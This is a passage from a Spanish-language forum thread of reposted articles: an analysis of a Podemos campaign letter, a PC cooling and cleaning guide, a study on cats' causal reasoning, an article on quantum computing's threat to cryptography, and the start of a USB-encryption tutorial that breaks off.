3. Siempre positivo

En honor a la verdad, Pablo Iglesias fue el primero en dar con esa clave cuando, en el mensaje final del anterior debate, pidió a la gente que votase con ilusión, la misma que les había llevado a las plazas en 2011. Aquella fue la semilla que, tras el fracaso de los últimos seis meses, ha germinado en esta Campaña de las Emociones. Por tanto, Podemos estaba mejor preparada que nadie para afrontarla: mientras Pedro Sánchez y Rivera se equivocan al apelar a emociones fundamentalmente negativas (azuzar a Podemos, machacar a Rajoy), la carta de Esperanza está escrita en positivo. Salvo ráfagas controladas de odio, como esa referencia a los chorizos, el objetivo es conquistar el voto apuntando al corazón. Los memes del Bien siempre, sin excepción, tienen más repercusión que los que nacen del rencor o el resentimiento: piensa en Chewbacca Mom o el niño que se fabricó una camiseta de Messi con harapos. ¿A que los compartiste porque te hicieron impacto en el alma?

4. Factor "Yo fui a EGB"

La referencia a Espinete no es casual. Su aparición en el primer párrafo tampoco. La nueva izquierda apela siempre que puede a la nostalgia pop como único pegamento generacional. Porque su target es, sin ninguna duda razonable al respecto, una generación muy concreta.


5. Target tan claro que da hasta miedo

Esperanza es hija de votantes socialistas, dato crucial. No parece muy probable que tú tengas que recordarle a tus padres que emigraron del campo a la ciudad y votaron a Felipe en 1982 cada vez que hables o les escribas, pero Esperanza lo hace. El target generacional al que UP está apelando con esta carta electoral está compuesto por los hijos de esos jóvenes de los 80 que recuperaron la democracia y participaron en "aquella inmensa ola de cambio". Se trata de trazar paralelismos con la situación de entonces y la actual, con el bipartidismo y la corrupción haciendo las veces de la dictadura y la Transición.

6. Doble impacto

El gato ya está fuera de la caja y, a estas alturas todo, el mundo sabe que la Esperanza que firma la carta no es una Niña de Rajoy, sino una persona auténtica. Esperanza Jubera fue candidata de Podemos a las europeas de 2014 y ha sido, a todas luces, la base real sobre la que se ha construido ese ejemplo universal de joven obligada a emigrar por las circunstancias, pero dispuesta a luchar contra viento y marea (o "solicitar el voto por correo", por utilizar la jerga de los tiempos) para poder mandar su voto, junto con todo su amor, a casa. ¿Quizá se ha descubierto el pastel? ¡No! Se han controlado perfectamente los tiempos, consiguiendo un doble impacto: primero, se deja que los medios especulen con que Unidos Podemos ha empleado la misma estrategia electoral tipo 'La gente de Bart' que Rajoy empleó cuando se preocupó por el desorbitado precio de "los chuches"; después, se vuelve a estar en el candelero cuando aparece la identidad de Jubera. Un viral, dos impactos.

7. He visto el futuro y funciona

Uno de los elementos más convencionales de la carta es su fetichismo por el futuro, algo que podríamos considerar raison d'être de toda campaña electoral. "Lo que votes ahora marcará los próximos cuatro años, y los próximos cuatro años van a ser tan fundamentales que te explotaría la cabeza si intentara explicártelo. Así que vótame y punto". Sin embargo, el componente generacional de la carta le da una nueva fuerza a su apuesta por un dulce porvenir: esos jóvenes a los que siempre se les ha dicho lo que tenían que hacer (es decir, que siempre han vivido bajo el yugo de un sistema creado por los hijos de la Transición) tienen la oportunidad histórica de conseguirlo. Es ahora o nunca, así que dadme a vuestros rendidos, a vuestros desamparados, vuestras masas hacinadas esperando respirar libert... Ups, perdón. Esa es otra carta viral.

8. La balada de Esperanza, la chica más ilusionada de Camden Town

Si tuviéramos que reducirlo todo a una única arma secreta, sería la increíble capacidad de la carta para construir una narración. En lugar de intentar establecer un impostado diálogo postal con el elector (en el que su única respuesta a cambio de tantas palabras puede ser uno o cero votos), UP opta por construir una narrativa. La historia de una chica que habla con sus padres, a los que quiere pese a que, en el fondo, forman parte del sistema que la ha obligado a marcharse al extranjero. Pero no pasa nada, no en realidad, porque ese sistema no es a prueba de memes y virales. O, al menos, esa es la baza a la que Unidos Podemos ha apostado todo lo que tiene. Es cuestión de Esperanza.






http://www.revistagq.com/noticias/politica/articulos/por-que-carta-buzoneo-podemos-esperanza-es-el-viral-perfecto/24087



Pues nada aquí os dejo la carta que me ha llegado a mi casa, la he buscado por Internet y prefiero poner la fuente de donde la he sacado pero es exactamente la misma que me ha llegado a mi casa.

Menos mas que dijeron los partidos políticos que iban ahorrar dinero de lo Españoles y que no iban a mandar propaganda pues nada un chorro de cartas en mi buzón, por lo que veo No han cumplido ningún partido político me ha llegado del PP,PSOE, CIUDADANOS Y UNIDOS PODEMOS todo juntos.

Decir que la carta de Podemos es la mas original pero indirectamente si leí la carta te esta pidiendo el voto.

De todas manera tengo claro ha que quien voy votar pero esto me ha resultado raro. :xD
#1954
1: La importancia del calor

Todos los componentes de tu ordenador necesitan energía para funcionar. Esta energía se transforma en calor cuando están en funcionamiento. Lo más importante es utilizar la forma más efectiva para disipar el calor que genera tu ordenador o portátil.

A pesar de que los componentes de tu ordenador están diseñados para soportar altas temperaturas de trabajo, si se les obliga a trabajar en estos límites térmicos durante demasiado tiempo acaba disminuyendo su fiabilidad y el riesgo de sufrir averías aumenta exponencialmente.


Procesador, tarjeta gráfica, placa base y disco duro son los componentes que más calor emiten. Todos ellos cuentan con sus propios sistemas de refrigeración adicionales diseñados para mantener a cada componente bajo unos límites térmicos seguros. Pero estos sistemas de refrigeración tienen un enemigo silencioso e implacable contra el que no pueden luchar y que poco a poco irá mermando sus capacidades de refrigeración: el polvo.

Por ese motivo, es necesario mantener los sistemas de refrigeración de tu ordenador siempre limpios y en perfectas condiciones para que puedan realizar su función de forma eficaz. Mantener limpios los sistemas de refrigeración evitará fallos de rendimiento o incluso apagados aleatorios cuando el ordenador lleve mucho tiempo funcionando o al realizar tareas intensivas, contribuirás a mejorar la fluidez de tu ordenador mientras juegas o evitarás costosas averías.

Con un sencillo mantenimiento de los componentes de tu ordenador conseguirás controlar la temperatura de la tarjeta gráfica de tu PC o del procesador de tu portátil y evitar molestias ocasionadas por un ordenador muy ruidoso, manteniéndolo en perfectas condiciones durante mucho más tiempo. Probablemente te aterre la idea de abrir la caja de tu ordenador y enfrentarte a ese laberinto de cables y circuitos electrónicos, pero en realidad es mucho más sencillo de lo que parece y, con las indicaciones sobre cómo realizar la limpieza y mantenimiento de tu ordenador o portátil, serás capaz de controlar las temperaturas y el ruido de tu ordenador dentro de unos parámetros más que aceptables y evitar muchas averías.

2: Refrigeración de los componentes de tu PC

No todos los componentes gestionan la temperatura de igual forma. Algunos fabricantes integran mejores sistemas de refrigeración en sus tarjetas gráficas o procesadores para procurar que las temperaturas sean lo más bajas posible.

Un buen ejemplo de ello son las placas base. En algunos modelos de las gamas media y alta se utiliza más cantidad de cobre en su fabricación para que la propia superficie de la placa base actúe como disipador del calor que se produce. Además, se instalan mayores disipadores de aluminio sobre los elementos que más se calientan para optimizar la refrigeración de la placa base.


En las tarjetas gráficas sucede algo parecido. Los fabricantes instalan grandes disipadores de aluminio que permiten controlar la temperatura de la tarjeta gráfica.

Ten en cuenta estos elementos de refrigeración mejorados a la hora de comprar tu ordenador o al sustituir alguno de sus componentes, ya que haciéndolo garantizas mejores condiciones térmicas, aunque al igual que el resto de componentes, sufrirá el inevitable y silencioso deterioro que produce el polvo suspendido en el ambiente.

3: Elige bien la caja para tu ordenador

El chasis de tu ordenador es mucho más que un simple receptáculo donde guardar los componentes de tu ordenador. Es una pieza clave para la correcta refrigeración de tu ordenador. De ella depende la circulación del flujo de aire fresco que deberá recorrer los diferentes componentes de tu ordenador y empujar el aire caliente de su interior hasta expulsarlo fuera de la caja y así evitar su acumulación y el recalentamiento progresivo.


La caja de tu PC también sirve como soporte para instalar de forma estratégica los diferentes ventiladores que forzarán la expulsión del aire caliente del interior de tu equipo. Estas capacidades térmicas no tienen por qué estar reñidas con un bonito diseño o un tamaño reducido, pero debes elegir la mejor caja para la refrigeración de tu ordenador.

4: Precauciones básicas para evitar el calentamiento de tu PC

Antes de comenzar el mantenimiento de tu ordenador, conviene tomar algunas precauciones para hacerlo con total seguridad y no dañar ninguno de los componentes.

En primer lugar, apaga y desconecta el equipo de la toma de corriente eléctrica. No basta con que el ordenador esté simplemente apagado, ya que algunos componentes se mantienen en "standby" y nunca se deben manipular con el ordenador activo.

Otro factor a tener en cuenta es la electricidad estática que acumula tu PC.


Los componentes electrónicos son muy sensibles a este tipo de electricidad y pueden dañarse con facilidad. Para evitarla, no manipules el ordenador si estás sobre un suelo de moqueta o alfombra y, sobre todo, toca siempre una parte metálica de la caja antes de tocar cualquier componente del interior y repite esta acción de forma periódica mientras manipules los componentes. De esa forma, descargarás la carga estática de tu cuerpo y no dañarás tu equipo.

Para evitar riesgos, también puedes utilizar una pulsera antiestática que descargará la electricidad estática de tu cuerpo de forma constante.

Otro punto importante es utilizar las herramientas adecuadas para desmontar los componentes. Los equipos más actuales cuentan con resortes que fijan los componentes a la caja y prácticamente no necesitarás herramientas, pero en la mayoría de los casos necesitarás al menos un destornillador con el cabezal adecuado.

No te la juegues, romper o desbocar la cabeza de un tornillo de fijación podría derivar en un auténtico desastre.

5: Mantenimiento para la refrigeración del procesador

El procesador es uno de los elementos clave en la refrigeración de tu ordenador. Mantener controlada la temperatura de la CPU es esencial para el óptimo funcionamiento de tu equipo.

Tras tomar las precauciones de seguridad que te hemos indicado, desmonta el panel lateral de la caja (habitualmente el panel izquierdo) y deja al descubierto el interior de tu equipo.

En él destaca el disipador del procesador que consta de dos elementos unidos entre sí: el bloque de aluminio del disipador y el ventilador que lo refrigera.

La forma más eficaz para limpiarlo es utilizar un bote de aire comprimido para limpieza que encontrarás en tiendas de electrónica. Sujeta el ventilador para que no gire e inserta la cánula del bote por las ranuras del disipador para eliminar el polvo. Puedes ayudarte de un pincel suave para eliminar todo el polvo adherido.

Además, cada dos o tres años es recomendable sustituir la pasta térmica que se aplica entre el procesador y el disipador, ya que ésta pierde sus propiedades termoconductoras. Para ello, debes desmontar el disipador de la CPU y desconectar el cable de alimentación del ventilador en la placa base.


El sistema de anclaje del disipador varía dependiendo del fabricante del procesador.

Los sistemas basados en procesadores Intel usan cuatro anclajes que se liberan girándolos media vuelta y tirando ligeramente de cada uno de ellos.

Los anclajes de los procesadores AMD utilizan una palanca que, al accionarla, libera unas grapas situadas a ambos lados del disipador. Después, mueve con cuidado el disipador hasta que se despegue del procesador.

A continuación, limpia el residuo de pasta térmica que ha quedado en la base del disipador y en el procesador. Aunque existen varias técnicas para aplicar la pasta térmica al procesador, la más sencilla es aplicar el equivalente a un grano de arroz de pasta térmica sobre la base del procesador y volver a instalar el disipador tal y como estaba. La presión ejercida al fijarlo extenderá la pasta formando una fina capa sobre la superficie de contacto.

Puedes comprar esta pasta térmica en las tiendas de informática. Déjate asesorar por el personal de la tienda ya que no todas tienen las mismas propiedades conductoras.

6: Mantenimiento de la refrigeración de la tarjeta gráfica

La tarjeta gráfica es otro importante foco de calor y uno de los puntos claves para controlar la temperatura de tu ordenador. Aunque es capaz de soportar altas temperaturas de trabajo, el sobrecalentamiento reiterado puede inutilizarla por completo.

La limpieza de la tarjeta gráfica es muy similar a la del procesador. Para realizarle un mantenimiento periódico, bastará con utilizar un bote de aire comprimido y un pincel para eliminar el polvo que obstruye la refrigeración.

En ocasiones el fabricante instala una carcasa de plástico sobre el sistema de refrigeración que dificulta mucho su limpieza. En ese caso, debes desmontarla de tu equipo para acceder fácilmente a todos los rincones.

En primer lugar, desconecta la alimentación eléctrica del cable PCI Express de la fuente (en caso de que tu tarjeta lo tenga conectado). Después, quita el tornillo que sujeta la tarjeta gráfica a la parte trasera de la caja (algunas cajas utilizan un sistema de anclaje sin tornillos).

Ahora, desbloquea la pestaña de sujeción de la conexión PCI-E de la placa base, y simultáneamente tira con cuidado hacia fuera, para extraerla. Al igual que sucedía con el procesador, la tarjeta gráfica también necesita renovar la pasta térmica, aunque ésta tiene una mayor duración, y el proceso para desmontar la carcasa de plástico y el disipador es algo más complicado.

Si a pesar de todo decides seguir adelante, puedes desmontar el disipador de tu tarjeta gráfica aflojando con cuidado los tornillos de sujeción que encontrarás en la cara del circuito impreso opuesta al disipador. A continuación, limpia los restos de pasta térmica, deposita una pequeña cantidad de pasta sobre el procesador gráfico y vuelve a instalar el disipador y la carcasa de plástico. Después, conecta de nuevo la alimentación eléctrica (si la tarjeta gráfica la necesita) y vuelve a conectar y fijar la tarjeta gráfica en tu ordenador.


7: Ordena el interior de la caja

La ubicación de los distintos componentes, así como la correcta colocación de los cables del interior de la caja del ordenador también ayudará a controlar la temperatura de tu ordenador.

Los componentes de tu ordenador deben, en la medida de lo posible, estar lo más separados unos de otros para facilitar la correcta de refrigeración de todos ellos.

Así, si tienes conectada la tarjeta gráfica en el conector PCI Express más cercano al procesador y necesitas instalar una tarjeta de red o de sonido, procura instalarla en las conexiones inferiores dejando el máximo espacio posible entre ellas y la tarjeta gráfica.

De lo contrario, bloquearán la entrada de aire fresco al disipador de la tarjeta gráfica, su temperatura se elevará y aumentará la velocidad del ventilador, produciendo más ruido y menos eficiencia de refrigeración.

Algo similar sucede con los cables de alimentación y conexión de los componentes de tu ordenador. Las cajas actuales cuentan con numerosas ranuras en el panel lateral de anclaje y espacio suficiente entre éste y el panel exterior de la caja. Este espacio facilita la gestión y organización de los cables internos de tu ordenador. Utiliza estas ranuras para agrupar los cables y ocultarlos en ese espacio entre ambos paneles. Esto, además de ofrecer un aspecto mucho más ordenado al interior de tu equipo, facilitará el flujo de aire por el interior de la caja.


Utiliza bridas o el sistema de fijación que prefieras para agrupar y organizar los cables en toda la caja y procura dejarlos lo más pegado posible a las paredes de la caja. De ese modo, los cables no bloquearán la circulación de aire fresco por todos los componentes de tu equipo.

En cuanto a la posición de los discos duros, si es posible, mantenlos separados para que el aire fresco circule por su superficie. Si tienes instalado un disco mecánico y un SSD, procura que el SSD esté por debajo del mecánico, de esa forma no le afectará el calor que emite el disco mecánico.


8: Ventilación forzada para la caja

Ya hemos comentado la importancia de mantener un flujo de aire fresco en el interior de la caja de tu ordenador o portátil. Para asegurar ese flujo será necesario instalar algunos ventiladores en la caja del ordenador.

El flujo del aire por el interior de la caja sirve para que el aire caliente que generan los componentes no quede estancado en su interior. Para ello deberás instalar unos ventiladores en su interior.

Básicamente se trata de meter aire fresco por la parte frontal inferior de la caja y que éste aire fresco empuje al aire caliente hacia arriba para finalmente expulsarlo por la parte superior trasera de la caja.

Dado que el aire caliente es menos denso que el frío esto se produce de forma natural, pero con un poco de ayuda de unos ventiladores se mejoran las temperaturas de tu ordenador.

Revisa las características de tu caja e instala un ventilador de la medida adecuada en interior del frontal de la caja. El ventilador tomará el aire del exterior y lo empujará al interior.

Examina con detenimiento el ventilador y observa que, en uno de los laterales, hay una flecha en relieve que indica la dirección en la que el ventilador empuja el aire. Instala el ventilador lo más abajo posible en el frontal de la caja con esa flecha apuntando hacia el interior.


Repite la operación con el ventilador de la parte superior trasera, pero en esta ocasión, sacará el aire caliente del interior de la caja. Por tanto, instala el ventilador con la flecha apuntando hacia el exterior de la caja. Después, conéctalos a las conexiones FAN de la placa base.

Si tu capa lo permite, puedes instalar otros ventiladores que empujen el aire fresco desde el lateral o que extraigan el aire caliente desde la parte superior de la caja.

Si cuenta con filtros antipolvo, mantenlos siempre limpios para no obstruir el paso del aire fresco o dificultar la salida del aire caliente del interior.

9: Controla la temperatura en tu portátil

Dado el reducido espacio disponible en su interior, la refrigeración de los ordenadores portátiles es complicada y son muy propensos a sufrir averías causadas por el sobrecalentamiento de la CPU o GPU de tu portátil.

Sus características compactas hacen que los portátiles solo cuenten con un número limitado de ranuras de ventilación en los laterales o en la parte inferior de la carcasa por donde debe entrar aire fresco que expulsará el aire caliente que se genera en su interior. Si se obstruyen esas ranuras, se impide el flujo de aire necesario para mantener fresco el interior y se produce un sobrecalentamiento de los componentes.


A pesar de ser algo muy común, la mejor forma de controlar la temperatura de tu portátil es usar el portátil sobre una superficie plana para que circule aire por la parte inferior. Evita a toda costa apoyarlo sobre tus rodillas o sobre ropa o cojines ya que la tela obstruirá las ranuras de ventilación del portátil y no se refrigerará correctamente.

Siempre que puedas, utiliza una base refrigeradora con el tamaño adecuado para tu portátil que haga circular el aire por la parte inferior, sobre todo si tienes que realizar una tarea que requiere un esfuerzo extra para el procesador o la GPU del portátil como puede ser ejecutar un juego o renderizar vídeo. Esto hará que tu portátil se caliente más de lo habitual, por lo que hay que extremar las precauciones para controlar las temperaturas del portátil.

Por otro lado, a pesar de que el diseño compacto del portátil hace algo más complicado su mantenimiento interior, es recomendable realizar limpiezas periódicas de los sistemas de refrigeración internos del portátil.

Debes poner especial atención en este punto ya que las marcas no permiten la manipulación interna de los portátiles durante el periodo de garantía, pero una vez superado ese periodo, realizar este mantenimiento tiene más ventajas que inconvenientes.

Tal y como te comentábamos en el caso de los disipadores de la CPU de tu ordenador, el polvo será un enemigo letal y silencioso para tu portátil.


Si notas que el ventilador interno de tu portátil se conecta más de lo habitual y que lo hace a altas revoluciones, habrá llegado el momento de coger un destornillador adecuado y desmontar su carcasa inferior para realizar una limpieza de la refrigeración interior de tu portátil.

Este proceso requiere ser algo meticuloso, ya que los tornillos suelen ser diminutos y podrían perderse fácilmente.

Este sistema de refrigeración consiste en un tubo de cobre que va desde el procesador, pasando por la tarjeta gráfica del portátil, hasta un radiador principal que, ayudado de un pequeño ventilador, se encarga de extraer el calor del interior de la carcasa de tu portátil.


Para limpiar el sistema de refrigeración de tu portátil lo mejor es utilizar el bote de aire comprimido que ya te hemos mencionado antes y un pincel suave para ayudarte a limpiar cada aleta del radiador o del ventilador.

También puedes desmontar con cuidado ese sistema de refrigeración y sustituir la pasta térmica de la CPU y GPU de tu portátil, limpiando los restos anteriores. Después, vuelve a montarlo todo tal y como estaba y notarás que las temperaturas de tu portátil están bajo control y ahora es tan silencioso como lo era cuando lo compraste.



Autor: Ruben Andres


#1955
Relacionan sonidos con objetos invisibles, lo que les ayuda a cazar.


Los gatos parecen entender el principio de causa y efecto, así como algunos elementos de la física. Combinando estas habilidades con su agudo sentido del oído, pueden predecir dónde se esconden posible presas. Estas son las conclusiones de un grupo de investigadores de la Universidad de Kyoto (Japón).

parecen entender el principio de causa y efecto, así como algunos elementos de la física. Combinando estas habilidades con su agudo sentido del oído, pueden predecir dónde se esconden posible presas.

Estas son las conclusiones de un grupo de investigadores de la Universidad de Kyoto (Japón), dirigido por Saho Takagi y publicado en la revista de Springer Animal Cognition.

Trabajos previos realizados por el equipo japonés establecieron que los gatos predicen la presencia de objetos invisibles en base a lo que oyen. En el presente estudio, los investigadores querían averiguar si los gatos utilizan una regla causal para deducir si un recipiente contiene un objeto, en función de si se agita junto con sonido o no. El equipo también quería establecer si los gatos esperan que un objeto se caiga o no, una vez que el contenedor se da la vuelta.

Treinta gatos domésticos fueron grabados en vídeo, mientras un experimentador sacudía un recipiente. En algunos casos esta acción iba acompañada de un sonido de traqueteo. En otros no lo hacía, para simular que la vasija estaba vacía. Después de la fase de agitación, se daba la vuelta al recipiente, cayera un objeto o no.

Dos situaciones experimentales eran congruentes con las leyes físicas: cuando el movimiento iba acompañado por un sonido (o no) y un objeto (o no) caía fuera del contenedor. Las otras dos condiciones eran incongruentes con las leyes de la física. O bien un ruido era seguido por ningún objeto cayendo fuera del recipiente, o bien no sonaba ningún sonido pero luego sí que caía un objeto.

Los gatos miraban más tiempo a los recipientes que se agitaban con ruido. Esto sugiere que los gatos utilizaron una ley física para inferir la existencia (o ausencia) de objetos en función de si se oía un traqueteo (o no). Esto les ayudaba a predecir si aparecería un objeto (o no) una vez que se diera la vuelta al recipiente.

Comprensión causal

Los animales también miraron más tiempo los recipientes en condiciones incongruentes, es decir, que cayera un objeto a pesar de haber sido sacudido sin hacer ruido, o al revés. Es como si los gatos se dieran cuenta de que tales condiciones no encajan en su comprensión de la lógica causal.

"Los gatos utilizan una comprensión causal lógica de los ruidos y los sonidos para predecir la aparición de objetos invisibles", dice Takagi, en la nota de prensa de Springer.

Los investigadores sugieren que el entorno de las especies influye en su capacidad para encontrar información basándose en lo que escuchan. La ecología del estilo natural de caza de los gatos puede por lo tanto también favorecer la capacidad para inferir a partir de sonidos.

Takagi explica que los gatos cazadores a menudo necesitan inferir la ubicación o la distancia de sus presas solo a partir de sonidos porque están en lugares de poca visibilidad. Se necesita más investigación para saber exactamente lo que los gatos ven con su ojo mental cuando captan ruidos, y si pueden extraer información como la cantidad y el tamaño de lo que oyen.


http://www.tendencias21.net/Los-gatos-entienden-el-principio-de-causa-y-efecto_a42786.html

Este post seguro que le va ha gustar ha constance :xD
#1956

La criptografía es una de las bases fundamentales de la seguridad de la información. Se utiliza para codificar y decodificar datos de modo que cumplan con los requisitos de confidencialidad, integridad, autenticación y no repudio de la información. En general se suele usar la frase "servicios criptográficos" para referirse a todos estos conceptos juntos.

Los avances en el criptoanálisis, la informática y la ingeniería extienden constantemente los límites de lo que se considera seguro. Por ejemplo, el sistema criptográfico RSA en una época se consideraba seguro porque usaba claves de 129 bits; sin embargo, hoy en día una clave segura debe tener más de 2.048 bits.

Otro ejemplo es el algoritmo MD5, diseñado en 1992. A pesar de que su función de hash fue una de las más utilizadas, en 2004 se comprobó que la clave se podía descifrar (mediante ataques de colisiones de hash).

Del mismo modo, en las conferencias de Eurocrypt 2016 se demostraron y publicaron los ataques de colisión denominados Freestart contra SHA-1 (que son un poco más fáciles de encontrar que las colisiones estándar).

Computación cuántica: la física aplicada a la informática

Uno de los recursos que se incluyen en el kit de herramientas para criptoanalistas es la computación cuántica. Para realizar las operaciones, las computadoras cuánticas se basan en las propiedades de la física cuántica, cuyo comportamiento es diferente a las propiedades electrónicas que estamos acostumbrados a encontrar en los equipos de hoy en día, y su unidad básica de información, en lugar de bits, se llama bit cuántico o qubit. Comenzó a utilizarse en ataques teóricos contra los sistemas criptográficos ya en el año 1994, cuando Peter Shor publicó un algoritmo cuántico para encontrar los factores primos de un entero dado.

Este algoritmo permite resolver la factorización de enteros y algunos problemas de logaritmos discretos, que conforman la base de la mayoría de los algoritmos criptográficos de clave pública más ampliamente utilizados (por no decir de todos). Con un impacto menos devastador, pero aún así de suma importancia, el algoritmo cuántico de Grover aumenta en gran medida la velocidad de los algoritmos de búsqueda, lo que afecta la seguridad de muchos sistemas criptográficos, incluyendo AES. Esto nos lleva a hacer una declaración bastante sorprendente: todos los algoritmos criptográficos más importantes que se usan en la actualidad quedarán (virtualmente) obsoletos.

Hoy en día, el único factor de mitigación es la falta de una computadora cuántica lo suficientemente grande como para ejecutar este tipo de ataque contra los parámetros que los algoritmos criptográficos usan en la actualidad.

Sin embargo, como es de esperar, en el ámbito de la computación cuántica todo evoluciona con rapidez. En abril de 2016, la Comisión Europea anunció un plan para invertir mil millones de euros en una "iniciativa emblemática de desarrollo de tecnologías cuánticas a gran escala para toda la UE". Así como se puso en marcha este programa, hay muchos otros que tienen el objetivo de financiar el desarrollo de computadoras cuánticas a gran escala.

También en abril de 2016, investigadores de Canadá establecieron un nuevo récord en la factorización con computadoras cuánticas, después de factorizar el número 200.099 usando un procesador D-Wave 2X, aunque no está claro si D-WAVE produce computadoras cuánticas universales capaces de ejecutar el algoritmo de Shor. Por otra parte, 200.099 solo es un número de 18 bits: es demasiado pequeño para obtener la potencia de cálculo necesaria para factorizar un número entero de 2.048 bits para descifrar los parámetros actuales de RSA.

La etapa actual de despliegue a gran escala de sistemas criptográficos de clave pública se basa en algoritmos bastante antiguos, como Diffie-Hellman (1976), RSA (1977) y Curvas Elípticas (1985). Este último se publicó por primera vez hace más de 30 años, pero recientemente empezó a desplegarse a gran escala.

Para hacer frente al Armagedón criptográfico impuesto por las computadoras cuánticas a gran escala, los criptógrafos de todo el mundo han estado trabajando durante al menos una década para diseñar y mejorar los sistemas criptográficos de modo que sean resistentes a los ataques cuánticos. Esto se conoce como la criptografía post cuántica o PQCrypto.

Son muchos los sistemas criptográficos que se diseñaron y hasta estandarizaron, como NTRU; sin embargo, lleva tiempo confiar en estos nuevos sistemas criptográficos, ya que se deben analizar a fondo una y otra vez hasta que se comprueba que están listos para un despliegue a gran escala.

¿Cuál es el estado actual de PQCrypto?



En 2006, se llevó a cabo la primera Conferencia de PQCrypto, que reunió a investigadores interesados en buscar alternativas seguras contra los ataques de la computación cuántica. En ese momento, ya estaban disponibles algunas alternativas, como el cifrado de McEliece (1978),  y desde ese entonces se han puesto en marcha muchos programas con el objetivo de financiar la investigación de PQCrypto.

Por ejemplo, el programa SAFECrypto de la Comisión Europea orientado al desarrollo de criptografía basada en retículos resistente a la computación cuántica, o el programa canadiense CryptoWorks21 para desarrollar herramientas de seguridad de criptografía cuántica de última generación para el siglo XXI. El resultado de todos estos esfuerzos hacia el desarrollo de PQCrypto es un gran avance en el campo y ya ha proporcionado candidatos post cuánticos que cumplen con todas las características deseadas de eficiencia y tamaño de clave comparables a los algoritmos clásicos.

Cabe notar que PQCrypto no requiere ningún hardware especial. Es similar a la criptografía clásica, pero se basa en problemas que son irrealizables incluso para las enormes computadoras cuánticas. Los algoritmos de PQCrypto se diseñaron para abarcar los servicios provistos por la criptografía clásica y muchos de ellos son capaces de funcionar incluso en las plataformas más limitadas.

¿Cómo evolucionará PQCrypto?

Incluso en un mundo cuántico, los protocolos de seguridad actuales seguirán siendo tan seguros como lo son hoy, si su diseño se verifica mediante el uso de sistemas criptográficos post cuánticos. Por lo tanto, en los próximos años seguramente notemos que los protocolos existentes comienzan a adoptar los algoritmos de PQCrypto modernos en forma gradual.

Veremos que disminuye el uso de los algoritmos de clave pública más utilizados hoy en día, tales como RSA y las Curvas Elípticas; en los casos de la criptografía simétrica y las funciones de hash, se tendrán que volver a revisar los parámetros actuales (por lo general se tendrán que duplicar) para asegurar que sigan siendo seguros en un mundo cuántico. Este cambio a algoritmos modernos debería ocurrir en forma transparente para los usuarios finales. Sin embargo, la persona responsable del desarrollo o la configuración de aplicaciones de seguridad deberá estar lista para los cambios que se aproximan: en particular, en lo que respecta al uso de estas funcionalidades en sistemas heredados.

A modo de especulación sobre el tiempo que tendremos que esperar para que las grandes computadoras cuánticas sean capaces de realizar ataques a sistemas criptográficos configurados con los parámetros de hoy, vamos a suponer que la ley de Moore es válida para todo el desarrollo de la computación cuántica. El algoritmo de Shor requiere aproximadamente 3 log2(N) qubits para factorizar un número entero N (lo que significa que los algoritmos de Shor requieren aproximadamente 6K qubits para descifrar una clave RSA-2048), mientras que la ley de Moore establece que el número de bits (o qubits en este ejemplo) que se puede empaquetar en un circuito se duplica cada 12-24 meses.

Un pequeño ejercicio cuántico

Como ejercicio, tomemos una computadora cuántica de 5 qubits como a la que IBM puso a disposición de los usuarios este mes. La cantidad total de qubits disponibles para ejecutar el algoritmo de Shor después de M ciclos de la ley de Moore se puede calcular como 5 * 2M, por lo tanto, si tomamos 18 meses como promedio del ciclo de la ley de Moore, transcurrirán aproximadamente dieciséis años a partir de ahora para que los ataques contra RSA-2048 se conviertan en una posibilidad, dado que se necesitan 16,5 años para pasar por 11 ciclos de la ley de Moore.

Esto significa que, después de este período, habrá 10K qubits disponibles (más precisamente 10240=5*211), lo que será capaz de suministrar los 6K qubits necesarios para ejecutar el ataque antes mencionado. La misma magnitud de qubits aplica para el algoritmo de Grover ("entre alrededor de 3.000 y 7.000 qubits lógicos") para atacar sistemas AES, por lo que el nivel de seguridad se reduciría a la mitad dentro de ese mismo período de tiempo.

Por lo tanto, si nuestras suposiciones son correctas, en dieciséis años AES-256 será tan seguro como AES-128 lo es hoy, y AES-128 ya no servirá. Por lo tanto, si recordamos el tiempo de preparación requerido por las Curvas Elípticas hasta su despliegue a gran escala, podemos darnos cuenta de que el tiempo ya está corriendo para PQCrypto.

¿De qué debo preocuparme y qué tengo que hacer?

Un tema que va a tener un gran impacto junto con el avance de la computación cuántica es la seguridad a largo plazo, que puede estar relacionada con:

-La autenticidad a largo plazo; como la vida útil de un contrato firmado digitalmente.

-La confidencialidad a largo plazo; por razones legales (por ejemplo, el Código Legal alemán determina que los registros médicos deberán seguir siendo confidenciales incluso tras la muerte del paciente) o por razones estratégicas, como los secretos de una organización o del gobierno.

La autenticidad a largo plazo se puede lograr mediante técnicas sencillas, como volver a firmar un documento con algoritmos seguros por el tiempo que sea necesario. No obstante, esta posibilidad tiene que estar prevista y garantizada por las leyes subyacentes o cualquier reglamentación vigente; de lo contrario, también se verá amenazada por el avance de la computación cuántica.

Pero por el contrario, lograr la confidencialidad a largo plazo es una tarea mucho más difícil. No existe un modo establecido de abordar esta cuestión y ninguno de los actuales sistemas criptográficos de claves públicas es capaz de cumplir esta tarea.

Podría ser una buena opción cifrar estos datos con fuertes sistemas de cifrado simétrico que utilicen claves de al menos 192 bits para mantenerlos seguros incluso aunque las computadoras cuánticas reduzcan su nivel de seguridad a la mitad.

Por último, si esperas contar con seguridad a largo plazo para tu información, debes empezar a buscar alternativas o a planificar estos cambios de inmediato. Sin embargo, los adversarios que en el presente todavía no logran derribar la seguridad de tu información al tratar de descifrar tus datos o falsificar tu firma pueden volver a probar suerte cuando consigan computadoras cuánticas.


http://www.welivesecurity.com/la-es/2016/06/14/computacion-cuantica-armagedon-criptografico/
#1957
1: Descarga e instala Rohos Mini Drive

Rohos Mini Drive es un programa que te permite crear una partición segura en tu Pendrive o unidad USB. Esta partición estará cifrada mediante contraseña, por lo que sólo tú y quien tú quieras podrá acceder a los archivos almacenados en su interior.

Para instalarlo primero deberás ir a la página web de Rohos y localizar el programa. Puedes descargarlo directamente a través de este enlace. Se trata de un programa freeware, es decir, completamente gratuito. Su peso es de sólo 2 MB, por lo que lo tendrás en tu disco duro antes de darte cuenta.


Una vez que tengas el archivo .exe en tu ordenador, deberás ejecutarlo y proceder con la instalación completa de Rohos antes de poder cifrar tu pendrive o partición del disco duro.

Deberás aceptar los términos y condiciones de uso, tener permisos de administrador del equipo y seleccionar la localización en la que quieres instalarlo. Lo normal cuando quieres instalar un programa, del tipo que sea.


2: Selecciona la unidad que quieres cifrar

Una vez dentro del programa, sólo se te mostrarán tres opciones. En este caso la que nos interesa es la de "Cifrar la unidad USB", que es donde tendrás que hacer click.

